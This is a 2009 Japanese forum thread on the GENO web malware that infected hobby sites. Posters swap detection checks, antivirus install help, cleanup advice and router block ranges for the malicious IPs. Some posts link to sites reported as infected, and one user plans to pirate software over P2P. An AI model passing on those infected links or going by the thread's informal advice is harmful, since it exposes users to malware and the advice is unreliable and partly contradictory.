Meにはデフォルトではchmはいっていませんが、他ソフト導入や更新をすると入るようです

同人のスレ見てたらwin98の人もいた・・・

疎い人なら今もふらふらネットサーフィンしてるんだろな
ちょっと挙動がおかしくても気にしなかったり
なんでもOK押したりさ･･･

そういう時期がわたしにもありました。

挙動がおかしくても、Win98だからかな、古いPCだからかな
程度で済んでしまうのかもしれないな

同人系ってPCの買い替えサイクルすっげ速そうなイメージあったのに
そうでもないのかね
Macとりなくすのユーザーがのほほんしててうらやましい・・・

こんな時だけだよな｢Linux使ってて良かった｣って思うのは

質問しに来ました
もし自分のサイトにスクリプト埋め込まれた場合、セキュリティソフトは警告出しますか？

というかWin98だとウイルスきかなそうなイメージがあるんだが
古すぎて
そんな事はないんだよなあ

これ結構酷いウイルスみたいだけど、ニュー速にスレないんだな

同人なんて貧乏なんだから、未だに９８とかＭｅとか使っているよ
動画サイトとかネトゲしなきゃ、普通にＨＰとかブログ読めるし

自作板住人だったのでGENO騒動早めに知って良かった

>>188
出るならこんなに広がってない

>>182
98やMeだと、そもそもFlash9までしか対応してない
恐ろしや…

>>188
使っているソフトによりますが、難しいでしょう。

>>193
じゃあ自分で感染してるのは気づかないんですね
自分のパソコンからソース見てもみえないのかな...

>>194
adobeのアクロバット・リーダーも最新バージョンは対応してないから
ｐｄｆ文書とかも読めない場合がある・・・

ところで、同人スレってどこのスレのこと？

>>198
【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122/

>>198
【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122/l50

テレビはエコポイントとインフルの話題ばかり
1分でいいからウィルスの話題をたのむ

ボットネットの一部となり、加害者になって、警察が来るなんて考えもしてない。
「だってわかんないんだもん」で済むと思っているだろうし・・・。
ウィルスとはよく言ったものだ。

お前らも豚の媒介者とならんように、マスクと手洗いウガイはしてくれよ。

http://www3.atword.jp/gnome/
記事が更新されてる。
俺がこの人だったら、イワンこっちゃない　って心底思っているだろうな。
感染したサイトに警告メールを出していたみたいだけど・・・

総被害額どれくらいになるんだろうか

>>187
信頼できるのは余剰パーツで組んだUbuntuマシンだけだぜ…

今IEでみてんだけどさ
Jane styleでみたほうが安全なんだよね。
デスクトップになぜかそのアイコンあるけど。
使ったことないんだよな。

感染サイト踏みそうになってから不安でたまらない
再起動できたしハッシュも大丈夫だし
ウィルスチェックもしたけど気持ちがもやもやする
いやなウィルスだなぁ

というか、違法な割れサイトとかゲームソフト違法ＤＬサイトとか
アダルト関係のサイトじゃなくて、一般のまともなサイトを閲覧しただけで
exeファイルを実行とかしなくても感染するって、今回が初めてじゃない？

・・・。

前にMSのサイトが改ざんされてウイルス撒かれたのはなんてウイルスだっけか？

WinnyとかShareみたいなＰ２Ｐ使わなければ安全だと思ってたのに・・・
まさか、実行ファイルじゃなくて、ただＨＰ見ただけで感染するとか・・・

>>207
そんな事は無い。昔からあった。
ただ今回は手法が少しだけちがった。

サイト見ただけで感染するウィルスなんか
今までいくらでもあっただろ…
どんだけ油断してんだよ…

カスペをダウンロードしたけどスキャンの仕方が分かりません
何度もインストールしますかと出てしまいます
ニフティも何度も使用しているパソコンの環境についての画面になってスキャンできません
何がいけないので出来たら助言お願いします

ちょっと聞きにくいんだけど同人ってどういう意味？

つオンラインスキャン

http://image.itmedia.co.jp/l/im/news/articles/0905/15/l_malware.jpg
これだよな？

>>207
>>210
それは10年前の話。
今回の手口も、これまでに何度も使われてきたやり方。
5年前の記事でも読め。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/

>>214
http://ja.wikipedia.org/wiki/%E5%90%8C%E4%BA%BA
同人（どうじん）とは、同じ趣味や志をもった人、仲間ないし集団のことである。

>>213
カスペじゃ削除できん
avastをブート時に起動させるんだ！
やり方は知らん、勝手にavastがやった

>>218
Ｍｅの場合、avastのブートタイム検査は出来ない

ブートってなに？

だめだこりゃ

>>217
逆に判りづらい説明してやんなよｗｗ

ところでClamwinの対応ﾏﾀﾞｰ

>>217
よくわかりました　どうも

>>214
同じ趣味、指向性をもった人ってところか。

>>220
http://ja.wikipedia.org/wiki/%E3%83%96%E3%83%BC%E3%83%88
ブート（またはブートストラップ、boot、bootstrap）は、コンピュータシステムの電源を入れたときに
オペレーティングシステムを起動するまでの処理の流れをいう。また、ブートローダ（boot loader）とは、ブート処理を行うソフトウェアを意味する。

少しはwikiれ

>>219
更新の止まってるOSでサイトを見るのに使うなよ
まわりへ嫌がらせになるだけじゃん

>>202
>ある状況によっては、MIME-sniffingとして知られたプロセスを通し、Internet Explororブラウザは
>html と同様に、この image fileを実行してしまいます。このことは、ブービートラップのように
>埋め込まれたイメージの中のスクリプトを実行してしまうことを意味しています。

…えーと、IEは画像ファイルからも感染するってこと？

>>225
ありがとう

>>227
だって、Ｍｅの入ったＰＣしか無いんだもん・・・

知るかそんなの
PC買う金がないなら働くか携帯でも使ってろ

>>218
自分で確認できた範囲では感染はしてないんですがスキャンできない以上怖いので
クリーンインストールしようと思います。
その後にアンチウイルスソフトが必要らしいんですが、ウイルスバスター2009では駄目ですか？
スレでバスターも挙げられてたのを見かけたんですが

>>190
何度か立ったけど、300前後でいつもdat落ち
さすがノーガード戦法のメッカ

>>230
こうやってボットネットが少なくならない原因になってるんですねぇ

RO
　　　　　　　､--‐冖'⌒￣￣`ｰ-､
　　　　 ／⌒`　　　　　　　　　三ミヽｰ-ﾍ,_
　　　__,{　;;,, 　　 　 　　　　　　 ミミ　　　ｉ　´Z,
　　 ゝ　　　''〃//,,, 　　　 　,,..｀ミﾐ､_ノリ}j;　f彡
　　_)　　　 　 　 〃///,　,;彡'rffｯ､ｨ彡'ﾉ从iﾉ彡
　　>';;,, 　 　　　 ノ丿川j !川｜;　 :.`7ﾗ公 '>了
　_く彡川fﾞノ'ノﾉ ノ_ノノﾉイシﾉ｜ }.:　'〈八ﾐ､､;.)
　 ヽ.:.:.:.:.:.;=､彡／‐-ニ''_ｰ＜、{_,ﾉ -一ヾ`~;.;.;）
　 く .:.:.:.:.:!ﾊ.Yイ　　ぇ'无ﾃ,`ヽ｝｝}ィt于 ｀|ィ"~
　　 ):.:.:.:.:|.Y }: :!　 　 ｀二´/'　;　|丶ﾆ　 ﾉﾉ
　 　 ） :.: ﾄ､リ: :!ヾ:、　　　丶　;　|　ﾞ　　ｲ:}　　　　逆に考えるんだ
　　 ｛ .:.: ｌ　｛: : }　 ｀　　　　,.__(__,}　　　/ﾉ
　　　 ヽ !　　`'ﾞ! 　 　　　 ,.,,.`三'ﾞ､,_ 　/´　　　「98やMeはPCではない」
　 　 ,/´{　　ﾐ　l　　　　/ﾞ,:-…-〜､ ） |
　　,r{ 　 ＼ ﾐ 　＼　　 `'　'≡≡'　" ﾉ　　　　　　　と考えるんだ
__ノ 　ヽ 　　＼　 ヽ＼　　　　彡 　,ｲ_
　　 　 　＼ 　　＼ ヽ 丶. 　　　　ノ!|ヽ｀ヽ、
　　 　 　 　 ＼ 　　＼ヽ ｀¨¨¨¨´/ |ｌ　ト､　｀'ｰ-､__
　 　 　 　 　 　 ＼　　｀'ｰ-､　　/／　/:.:.}　 　　 　 ｀'ｰ､_
　　　　　　　 　 ｀､＼　　　／⌒ヽ　 /!:.:.|
　　　　　　　　　　｀､ ＼ /ヽLｆ___ハ/　　{
　　　　　　　　　　　　　 ′ /　! ヽ

>>231
買う金はあるよ
今、電気店へ行ったりして物色中
何を買えば良いか迷ってる

予算は７万くらいで、現在ノートＰＣしか持ってないので
デスクトップ型ならモニターも買わなきゃいけない
とりあえず、ＯＳはＸＰにすべきかＶＩＳＴＡにすべきか、７にすべきか
後、プリインストールされた本体を買うべきか、別個に買って自分でインストールすべきか・・・

色々と悩むんだな

>>230
朝っぱらから萌えたw

>>235
PCではない……つまりMacということか！

まったく初心者ですが、とりあえず何をしたら感染してるかわかります？
1読んでもよくわかりません
あと感染してたらLANで繋がったPCも全部ヤバいですかね？

前からネットに接続しただけで感染するウイルスとかあったじゃん

>>236
クレカ情報が抜かれるんですね判ります

テンプレ全部読めよ

>>232
だめ
ウイルスバスターはこういうのの対応遅い

チラシの裏に書け

>>236
8000円の中古PCで十分。

>>239
PC全部窓から投げすればおｋ

>>245
じゃあ、今のＭｅで十分だろ

>>239
読む気も理解する気もないだろ

クリーンインストールってメーカー製のパソコンじゃできないんですか？

>>230
こういうの見てると
やっぱりネット接続は免許制度と車検制度（PC検？）みたいなの導入すべきだよなあとつくづく思う
前スレだかに５年くらいしか使ってないのに新しいの買えるかって言ってる輩がいて
そのときもやはり同じ事思った

>>239
インターネットしたら感染する
ＬＡＮケーブルで繋がったＰＣ、プリンタ、ルータはヤバイ

>>249
少しは自分で調べろ

>>247
問題はサポートが続いてるOSを使う事が第一であって速度は二の次だ

>>249
そのぐらいもわからないならメーカーに電話してこい。
ここより親切に対応してくれるぞ。

PC買い換えるなら要らなくなったPCくれよ

>>253
８千円でサポート続いているＯＳの入った中古ＰＣ買えるのか？

>>249
ググレ

>>240
ネットに繋ぐ「だけ」で感染するブラスターとかあったなあ…

>>239
読んでないだろ
100回読んでもどうしてもわからないなら同人板の方のwiki行け
同人の方の場所がわからないとか言うなよ、抽出しろ

いい加減スレチ

>>243
レスありがとうございます
カスペはインストールしたんですがkis8ってフォルダの中にあるsetupを開こうとすると
「インストールのログファイルを開くときにエラーが発生しました。指定されたログファイルの場所が存在し、
書き込み可能であることを確認してください。」と出てスキャンできないんですが
何がいけないんでしょうか。

>>256
XPの初期のがごろごろ出てる
なんだかんだいっても出てから8年だからなXPは

>>255
要らなくなったＰＣは、Ｐ２Ｐ用にするつもり
一度、WinnyとかShareってやってみたかったんだ
でも、個人情報流出とか怖いんで、専用ＰＣ持ってない状態じゃすべきじゃないと思っててね
もし、新しいＰＣ買ったら、古いＭｅの入ったＰＣはＰ２Ｐ専用マシンになる予定

>>256
ＸＰ　PRO PEN4 搭載がごろごろあるっつーの。

>>256
2kのなら買えるかもな

>>263
延々とウイルスにかかるわけですね

>>263
ダウンロードも違法扱いになったの知ってるか？

>>264
本体だけ？ノート？
本当に８０００円でＸＰインストール済み？

>>263
セキュ板で割れ宣言するヤツがいるなんて・・・

>>268
この店安いから探してみ

http://www.geno-web.jp/

>>268
スリムタワーが多いかな5000円ぐらいからが多い
ノートだと10000円からかな

>>250
じつは同じヤツだと思うよ。
そのPCでクレジットカード使ってみろって話。
それが嫌で、危険だと分かるなら、ネットにつなぐなって、そう思うよな。

>>261
多分、ディレクトリに日本語が混ざっている。
ドライブのルートでやってみれ。

>>228
そのサイトの人は、そう書いているね。
IE7以前だと、そう（ヤバイ）みたいだね。
IE8では対策されているみたい。

いずれにしても、これまでにあがったような対策をしなきゃならん。

>>261
最初インストールする時にセットアップするファイルを解凍してできるのがkis8フォルダで
インストール先は変えてなければC:\Program Files\Kaspersky Labです

インストールができたらkis8フォルダはもう要らないので捨てていいよ

>>263は釣りだろ
こやつめははは

>>270
らめぇえぇぇっぇぇえ

>>270
>>268じゃないけどありがとうw

>>270
http://www.geno-web.jp/

本当に、安いね

>>263
残念　(^^;

GenoウイルスのスレでGenoのサイト勧めるとかｗｗ

>>268
デスクトップは本体だけで８０００円
１５モニタ付きなら１２０００円
ノートなら2万
どれも４年から5年落ち
初心者はリカバリＣＤ付き買いなよ。

★3まで超マッタリだったのに一昨日からのこの加速ぶりはなんなんだ・・・

ウイルス入りだから安いんだろ

何このGENOマッチポンプ商法

http://www.geno-web.jp/Goods/GB09002150.html
【良品中古】 DELL OPTIPLEX GX60 [OPTIPLEX GX60]
(Cel 2.40GHz/ 512MB/ 40GB/ DVD-ROM/ WinXP ProリカバリCD付き)

[販売価格] 7,999 円
これで良いじゃん

>>281
同人板の腐女子連中が流入してきた

安物買いの銭失いになりかねんわ

>>281
同人スレから流れてきてるんじゃね

>>284
ウイルスもプリインストールされてるんだろ？

>>268
使い捨てPCっていいぞ。

そういやアンチウィルスソフトも安売りしてたよね

>>284
企業の払い下げとはいえ、十分使えるスペックのマシンがゴミのような値段とは、恐ろしい世の中だ

次スレいらないね

http://www.itmedia.co.jp/enterprise/articles/0905/14/news020.html
偽フラッシュのインストールを促すらしいぞ。
みんな気をつけろよ。

>>284
このＰＣショップは信用できるのか？
ＨＰにウイルス仕込まれているようなところだろ？

やっぱ、買うならソフマップとかで買いたいわ
アフターケアも何も無いような弱小の中古ＰＣ屋だと
使い捨てのサブＰＣなら良いけど、メインとして使うには怖い

>>272
すみませんドライブからルート検索するってどうやるんですか。

>>273
ファイル名を指定して実行したらたくさんファイルが出てきたんですが、
カスペらしき名前のファイルが見当たりませんでした。
どんな名前かとかわからないでしょうか。

見積りとかはVIPでやれよ
ここはセキュリティ板

GENOのURL貼るなw
心臓がどっきんこ言っただろｗ

やっぱ、「ＧＥＮＯウイルス」って名称は
中古ＰＣショップの「ＧＥＮＯ」が発祥だから？

>>294
ソフマップはまともな買取してないからハズレ率が高いよ

>>298
YES

>>299
でも、すぐに潰れるってことは無さそうだし、一応、アフターケアもしているじゃん
困った時に、電話で質問できるってのは大きいよ

ソフマップ以上に信用できる大手の中古ＰＣショップってあるか？

>>295
画面の右下のカスペアイコン右クリックでスキャンとか設定とか

カスペアイコンある？　ちゃんとインストール出来てるのかな？

>>293
これ見て、逆にAdobeのアップデータも入れていいのか混乱する人出そうだなｗ

>>94
勉強になるなぁ

>>298
ＧＥＮＯの対応があまりにもすばらしかったから、それに敬意を表して
ＧＥＮＯウイルスと呼ぶようになった

>>295
あとエクスプローラでファイルやフォルダやドライブを右クリで
カスペマークのスキャン

>>94
＞本当に必要なファイルはVirusTotalにかけて、
＞それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
＞そしてしばらく凍結。
＞今は完全に　悪意の攻撃者　＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞セキュリティーベンダー
＞だから、1ヶ月（いや、最悪半年か？）くらい、不要ファイルは寝かせて、
＞セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
＞その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。



勉強になるなぁ

>>298
実際、どっかのセキュリティベンダーが、
その初代ウィルスをGENOなんとかって命名してる

ところで、外付けＨＤＤに全ファイルを対比させたとして、
後でＵＳＢでクリーンインストール後のＰＣに接続した時に、
外付けＨＤＤに潜んでいるウイルスがクリーンなＰＣ本体に入り込む危険は無いの？

>>309
危険は有る

>>295
ごめん。
そういう意味じゃなくって、
setup.exeの親フォルダはkis8なんでしょ？
そのまた親フォルダか爺さんフォルダか、ひい爺さんフォルダに日本語を含んでない？
例えば、Dドライブ直下に半角英数でKIS8ってフォルダを作って、そこにKIS8の全ファイルを移動してWクリックで
セットアップが起動しないか試してみて。

現状は知らないけど同人板はウイルスが原因で爆撃されて被害に遭ってたよな。
P2Pは関係なくてロダに上がってるファイルから感染してる場合が多いのも特徴だった。

629 ：GENO：2009/05/16(土) 07:04:38 ID:SvPTTP+Z0
GENO（ジェノ）ウイルス。
まさにGENOCIDE（集団虐殺）

誰がうまいこと言えと。まぁ俺なんですけどね。

Virtual BoxにUbuntu入れて
それでネットやるか

google charmは今のところ閲覧問題なし？

>>284
開いちゃったんだが大丈夫だよな…？

GENOのおかげで日本中に広まったんだから
敬意を表してGENOウイルスと呼んでやろうぜ

ああカスペをインストールできてないみたいなのか

同人板の連中なんてhtmlも使えない奴ばっかだろ
何言っても無駄

>>302
デスクトップにはkis8って名前のフォルダとkis8.0.0.454.jptaって名前のアイコンがあります。
kis8.0.0.454.jptaのアイコンを右クリックすると開くは出るんですがスキャンは透明でクリックできません。
開いて実行を選択するとC:\Documents and Settings\as\デスクトップ\と出ます、
解凍をクリックすると既に同名のファイルが存在しますと出ます。

>>273さんが教えてくれたC:\Program Files\Kaspersky Labを入力して実行してみたら
インストールの画面が出たんですが、この画面は何度もでてインストールはしたはずなんですが、
やってみたほうがいいでしょうか。

>>316
あなたの危機感がアウトー

>>316
大丈夫ですよ＾＾

って言ってもらえば満足か？

>>312
それもあるだろうけど
個人でサイト持ってる率が他より多いからじゃね？
FTPでうｐする際に撒くと

>>316
感染した可能性はありますん

>>310
じゃあ、一旦、外付けＨＤＤに内容を退避して
ＯＳ再インストール後のクリーンＰＣに戻すことは出来ないの？

ＵＳＢで接続した瞬間にウイルスが入り込んでくる？

>>320
>>272じゃないけど、フォルダのパスに「デスクトップ」っていう日本語が入ってるからアウトなんじゃない
つまりは、ドライブルートに入れて（つまりマイコンピュータ開いてCドライブ直下にフォルダを移動して）実行すればいけると思う

>>320
同名のファイルが存在しますと出るのはもうすでにkis8フォルダがあるから
一度kis8フォルダを削除してkis8.0.0.454.jptaを>>311さんの言うとおり
D:\とかC:\に移動してからダブルクリックでインストールして

>>313
ひそかにうまいと思っていた。

>>295
はカスペインストールできてないと思うんだよ。　
解凍しただけだから、setup.exeを起動してインストールさせようとしているんじゃないの？

そう思って>>311　を書いた。
>>320
インストールできていない。
プログラムの追加と削除で確認してみな。
インストールできていたら、セットアップ画面でポリシーと尋ねられるから、そこで迷うはず。
すでに通過したとは思えない。

>>316
トップしかみてないけど、トップは大丈夫くさい。
スクリプトはGeno関連のgoogleだけで、いつもと同じ。

インストール終わったらkis8フォルダ入れないので削除ね

訂正
インストール終わったらkis8フォルダ要らないので削除ね

>>325
とりあえずなんのために時間を置くのか解っているのか

>>284のサイトを開いたがVistaだから問題ないな

Skypeとかメッセンジャーは感染元になったりすることはあるんでしょうか

>>333
他のウイルスならある

仕方ないから貯めた画像だけでチンコしごくか
ひさじぶりに見た画像が妙にエロくて右手が止まらないｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>334
回答有難うございます

>>335
楽しそうだなｗｗｗｗｗｗｗｗ

>>333
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20071128nt0d.htm

同人板へお帰りください＞＜；

同人板でデフォルト名無しで書いてるのはこっちから流れてった人か？
デフォ名無しは各自あぼーん対象だぞあそこは

>>325
時間おけば、セキュリティーソフトが対応してくるだろうけど、
USBの自動再生はきっておいた方がいい。

http://support.microsoft.com/kb/967715/ja
http://www.atmarkit.co.jp/fwin2k/win2ktips/1139autrun/autrun.html
http://blogs.technet.com/jpsecurity/archive/2009/02/25/3206334.aspx
MSがヘマやらかしてるから、情報が交錯していて結構面倒。

うるおぼえだけど、マイクロソフトがXPにおけるUSBの自動再生は無効にする予定だった気がする。

>>335
うおい！なんかイカくせーぞｗ

USBの自動再生なんぞ
Shell Hardware Detection
っていうサービスとめればすぐとまるだろ

Vistaでも感染するんじゃない？

ieがアドビの更新頻繁に求めて来たぞ

　他人の不幸で今日も飯がうまい！！
　　　　＋　　　　　　　 ＿＿＿_ 　　　＋
　　　　　　＋　　　／⌒　　⌒＼ +
　　　ｷﾀ━━━／／･＼ .／･＼＼━━━━!!!!
　　　　+　　　／::::::⌒（__人__）⌒:::::＼ 　+
　　　　　　　 |　 ┬　　 ﾄｪｪｪｲ 　　　　|
　　　　　＋　 ＼│　　　`ー'´ 　 　 ／ 　　　＋
　　　　　＿|＼∧∧∧ＭＭＭＭ∧∧∧／|＿
　　　　　＞　　　　　　　　　　　　　　　　　　＜
　　　/　　─　/　　/＿　──┐ヽ|　 |ヽ　 ム ヒ　|　|
　＼/　　─　/　/￣　/　　　／　　|￣|￣　月 ヒ　|　|
　 ノ＼　＿_ノ　　　_ノ 　　＼　　 / | ノ ＼ ﾉ Ｌ_い o o

>>344
感染する

>>345
そう言いながら実はウイルス飼ってるんですよねｗ

>>306
>>320
>>326
>>327
>>311
レス遅くてすみません。
Ｃドライブに移して実行したらインストール画面が出てきました。
インストールをクリックすると既に同じバージョンの製品がインストールされてます。上書きインストールを始めますかとでます。
続けても平気でしょうか？

いまさらな質問で悪いんだが、同人サイトが感染ってことはその各管理人がロガーでパス抜かれてサイト編集されたってこと？
だとしたらキーロガーとしてもそうとう恐いウイルスって認識していいの？
流れに乗り遅れていまひとつよくわからん

〉〉346

把握

そういえばこの間、Adobe Readerのアップデートしやがれって連絡が何度もきてたっけ
これが原因か

>>349
うｐする時にファイルにコード書き込むんじゃないっけ？

>>344
えっ！？

何なのこの勢いw

今ルーターの設定をやっているのだが、拒否するIPアドレスは94.247.0.0/16でOKですか?

>>348
わけわからなくなってるようなのでプログラムの追加と削除で一度アンインストールして
初めからやり直すのがいいんじゃないかな

>>349,352
両方だな感染したままだとうp時にうp先にも繁殖
PC側をクリーンにしてもPWがキーローガーで流れててれば改竄さえる危険が有る

語尾にwを付けたがる奴は同一人物か？
同人板に帰れよ

うほっ、今更ながらcmdとregedit立ち上げを試してみたがどっちも立ち上がった
ＭＤ５改変もない、Adobeのリーダーは削除したがフラッシュプレイヤーは10.22.87（？）と確か最新
感染したかもと恐怖したがどうやら大丈夫そうだな・・・
ただ同人サイトの巡回は当分無理だな、しょうがないとはいえ

kis8フォルダも削除ね

まあちゃん♪

>>356
試しにインストールクリックしたら
「インストールのログファイルを開くときにエラーが発生しました。
指定されたログ、ファイルが存在し書き込み可能であるか確認してください」とでてしまいました。

アンインストールしてみます。

そんなあなたにLinux
USBメモリからも起動できて同人サイトの巡回もウマウマ

>>355
他にもあるみたい

>>349
キーロガーじゃ無い事に注意

>>355
厳密に94.247.[2-3].[0-255]だけを弾きたいなら、94.247.2.0/23でもいいんじゃない
俺はFWには94.247.0.0/16で登録してるけど

>>341
ＵＳＢで接続された外付けＨＤＤの自動再生、つまり「プラグ・アンド・プレイ」のこと？

自動で中身を読み込まなければ、ＵＳＢ接続して外付けＨＤＤの中身をavastとかでチェックかけて
何も出てこなければＰＣ内部のＨＤＤにコピーしてもＯＫ？

>>355
それはちょっと前のZlkonだね。
今は、94.229.65.160/27が必要。

MS、Autorunを正しく無効化するための更新プログラムを公開

>>1に載っているサイトさん（atword.jp/gnome）の最新記事、
矛盾しているように見えるのですが、もし感染していた場合、
サイトのクリーンアップとローカルのクリーンアップどちらを優先するべきですか？



以下のふたつの文章です
--------------------------------------------------------------
＞附記的な注意になりますが、すべてのイメージファイルをバックアップから再アップロードしてください。
＞※注意：先に全サイト内の全部のディレクトリからすべてのファイルを消す必要があります。

--------------------------------------------------------------
＞絶対に感染したＰＣで感染したサイトのクリーンアップを行わないでください。
＞貴方はまず先に、感染しているかもしれないローカルなＰＣのクリーンアップから開始しなければなりません。

http://www29.atwiki.jp/geno/pages/14.html
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断

↑
この情報は古い

>>370
まずは自分のPCをきれいにしてください。

クリーンアップ (Clean up) とは野球に於いて、塁の上にいる走者を生還させることが期待される打順のことである。

ここの>>2見てAdobe Readerってダメなのかと思ってAdobe Acrobat Readerググったら有料かよ
大人しくAdobe Readerでチェックボックス外すか
それにしても、カズペが落ち目だからノートン乗り換えようと思ったら、そのノートンがGENOには残念対応とか・・

>>368
もう94.0.0.0/8とかでいいよｗｗ

テンプレにこれ入ってないな

PeerGuardian 33
http://hideyoshi.2ch.net/test/read.cgi/download/1237676474/

>>371
いまはどうなってんの？

>>373
なるほど、だから「走者一掃の満塁ホームラン」などと言われるのか。

もしサイトがもう感染してたらファイル消した方がいいんだよな？

>>355
ttp://www.rupan.net/uploader/download/1242369471.txt
ttp://www1.axfc.net/uploader/File/so/23641.txt

サイダーなら下の方がいいね

ん？
Acrobat Readerの改名がAdobe Readerだよね？

戒名な

不安なやつは、再インストール。

これが鉄板。

>>379
自分のPCを綺麗にする→サイトを綺麗にする　の順。
出来れば自分のPCをきれいにした後FTP Password変更

汚染されたPCからサイトのファイルを操作してもいたちごっこ。

>>284
吹いたｗｗｗおっめーふざけんなお

noscriptさんとavastくんに警護されてるから屁でもないぜ

>384
汚染されたPCからでも既にファイル改竄されてしまってるなら
全部消した方がいいんじゃないの？見た人感染するから
ファイル改竄がまだならアクセスしたらまずいんだろうけど

まとめサイトがおかしいという話をきいたが

>>380
40箇所以上もあるのか。
うちのルーターは最大で32箇所なのだがorz

え、３時間前と変わってない気がする＞まとめサイト

どこがおかしいのか指摘ｐｌｚ

>>386

>>379は既にサイトが感染した場合を想定している。
早急に汚染を拡大させない＊だけ＊の目的なら、自身のWeb用htmlファイル全削除後に
サイトのファイル全消去。
だろうけれど、復旧にどれくらい時間がかかるかな。

おとといまで保守気味に書き込んでたのに
ここ2日で一気に進行加速しててﾜﾛﾀ

やっと認知されてきたのに、対応法は進化してないのがｶﾞｸｶﾞｸ(((( ；ﾟДﾟ))))ﾌﾞﾙﾌﾞﾙ

>>387
同人サイト向けWiki

>>388
そんなに無理ｗｗ

カスペインストール失敗した者なんですけど、一度アンインストールしました。
もう一回インストールするときに気をつけたほうが良いこととかあったら助言お願いします。

693 geno New! 2009/05/16(土) 09:34:37 ID:lv1QsSrS0
今急いでチェックしてきた。これは怖い
サイトの日記でも注意喚起して来た方がいいね

あと同人向けまとめWikiのGENOウィルスまとめへのリンクが
違うサイトになっててビビったから報告


694 GENO sage New! 2009/05/16(土) 09:37:15 ID:oOSNfhyI0
>>255の、まとめサイトへのリンクが変なんだが…
関係ないページに飛ばされる。ちなみに飛んだ先でnoscriptがjs4個ブロックした

誰かに弄られたんだな

Avira、対応したな
過信は禁物だが

Engine Update AV8/9 8.02.00.168 / AV7 7.09.00.168 (2009-05-15)
- Updated: PDF exploit detection
HTML/Shellcode.Gen

>>397
有志が毎日報告してくれてるけど、その時点ではスルーも多いから
本当に油断禁物

>>388
でも、まだ増え続けてるよ

いや>379も>386も自分です

PCだけウィルス感染してる場合はすぐクリーンインスコ＆パス変更で、
PCもサイトも感染済みの場合は、もうパス抜かれてるんだから
感染拡大防止に鯖のファイルまず全部消した方がいいんじゃないのかと思ったのです

>>394
前回のインストール用のkis8フォルダが残ってないかチェック

>>391
Vista機の購入で解決。
間違っても、安易にXPからVistaにアップしないこと。

Vistaでも感染してる人がいるらしいじゃない？

hXXp://www.zengozen.co.jp/
も感染確認

システムドライブ以外のドライブのデータファイルも改竄されたりするの？

>>401
ありがとうございます、消せました。
あと最初にカスペのサイト開いた時はまとめwikiのリンクから行ったんですが
wikiおかしくなってるんですよね。
検索かけたいんですがカスペって何て正式名称何だったでしょうか。

>>404
GJ　踏んできま〜す

>>406
カスペでぐぐればカスペルスキーがでてくるだろ。
どこまで教えてちゃんなんだよ・・・

vista感染した奴は挙手！
uac切ってた？

カスペルスキー

>>406
Kaspersky （カスペルスキー）

ジャストシステムのとこでいいのかな？
ttp://www.just-kaspersky.jp/

一応カスペWiki
ttp://kaspe.2chv.net/wiki/index.php?FrontPage

>>404
ヤバッ！埋め込まれている！

>>404
>>31
あほ？

なんだいｗ載ってたやつかｗ

放置されてるな

４月くらいに再起動できなくなるとか言ってたけど今どうなの？
regeditなんてそうそう使わないから気付かなそう

ノ

切ってないけどIｅがアドビの更新頻繁に求めて来た

因みにアバストで検査したけど出てこなかった

バックアップした外付け感染してんのかな…

>>408
すみません、先に調べるべきでした。

>>410>>411
ありがとうございます。

avastに乗り換えてスキャンやってるんだが
かなり時間かかるのなこれ

ここで出てくるavastってフリー版のやつだよね？　有料版あるのかは知らないけど
avastって他のウイルスに対してはどうなのかな？
avastって良いんだろか？　avastたんがいいのは分かるんだけど

avastかAVGで昔迷って
AVGだったけど今回からavastになった

もうブラウザにpdfを表示しないみたいなオプション付けろよ

>>400
PCだけの感染だけならば多分そう。
ただサイトのも変更されていた場合は、アクセスし削除する前に
自身のPCのhtmlを削除し無いと消している間等で、本人が消したつもりでも
再度なにかが転送される恐れがある。

流れ早いお

カスペってKaspersky Internet Security 2009とKaspersky Anti-Virus 2009、
Kaspersky Anti-Virus for Windows Server 6.0 Home Server Editionのどれがいいんですか？

>>63でも出てるけど、うちもcmd.exeで実行して
「dir C:\WINDOWS\system32\sqlsodbc.chm」で
エンター押したら「ファイルが見つかりません」って出る。
XPなんだが、ファイル一体どこにいるんだ……。
それともアウアウってこと？

>>421
ありがとう
ここ2年くらいカスペ試用版で特にまだ感染とか無いんだけど気になって聞いてみました

>>426
なんで普通にエクスプローラで見ようと思わないんだよ

>>422
Fxならプラグインから無効化出来なかったっけ
てかお前らそもそもPDFなんて読むよむのかよ
AReaderごとアンインストール→smartpdfで良くね

>423
なるほど解りました
ありがとう

そういうときは地道に辿っていくしかないべや
Cドライブ→WINDOWS→system32
で、自分の目でsqlsodbcってファイルを探す

>>428
ああありがとう！それでも見られたね！
感染を自己申告したサイトを見ててすげえてんぱってた。
50KBだったのでようやく安心できたよ、有難う！

>>431は>>426へのレス

このウイルスって万全な対策法がないんだよね。
それじゃクリーンインストールしたところで再感染しそう。。
しかも感染か未感染かを確実に判別する方法がないから、いつまでたっても疑心暗鬼。
めんどくさい。。

>>431

>>422
PDFをブラウザに表示ってAdobe Reader側にある

>>426です

>>431さんもありがとう。
てんぱりの余韻で変に安価だけ投稿してしまった。
それでは七誌に戻ります。

>>425
普通のPCならKaspersky Internet Security 2009

>>426
同人版のまとめwikiは何かが全角だとかでそのままコピペはダメらしい
同人版のスレ内にコピペが貼ってあるからそれコピペすれば普通にでてきた

今回ばかりは対策しないとだめだと思って
昨日の夜からはじめたらもう朝だぜ・・・

今回のやつとは関係ないけど

うちのavastが反応するんですが、なにこれ
りぶメールってところのサイト
ttp://www.livmail.com/3others-page/janet/tokusen/index.htm

>>438
ありがとうございます！

ってかリブメールのトップで反応あり

>>441
ばっちり関係あります

h抜きでも飛べるから工夫して貼れっつーの

>>439
\　が全角だから

regeditはファイル名の先頭がregedの場合動作できないみたいだから
c:\windows\regedit.exeをデスクットップにでもコピーして名前変えて実行すると普通に起動できた

441はあぼーん依頼すべきだな

工夫して貼ってないとわざとやってると思われるよ
